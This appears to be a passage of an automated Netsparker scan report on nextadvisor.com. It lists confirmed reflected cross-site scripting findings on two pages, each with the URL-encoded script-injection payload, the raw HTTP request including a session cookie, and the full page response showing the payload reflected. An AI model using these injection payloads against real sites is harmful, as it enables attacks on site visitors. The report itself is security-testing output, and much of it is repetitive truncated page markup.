log2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog2..
- /remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E

/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000327)</script>

Request

GET /remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/remote_desktop/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6159
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", remote desktop, remote access, remote desktop access, GoToMyPC, Radmin, LapLink Everywhere, Symantech pcAnywhere" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/remote_desktop/'"--></style></script><script>netsparker(0x000327)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000327)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/remote_desktop_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Remote Desktop FAQ</h1> <p>Frequently Asked Questions about Remote Desktop</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Remote Desktop:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="remote_desktop"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-b..
- /savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E

/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000332)</script>

Request

GET /savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/savings_accounts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6084
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", savings account, savings accounts, online banks, internet banking, internet saving, Ally, ING Direct, Discover Online Savings Account, EverBank" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/savings_accounts/'"--></style></script><script>netsparker(0x000332)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000332)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/savings_accounts_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Savings Accounts FAQ</h1> <p>Frequently Asked Questions about Savings Accounts</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Savings Accounts:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="savings_accounts"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div 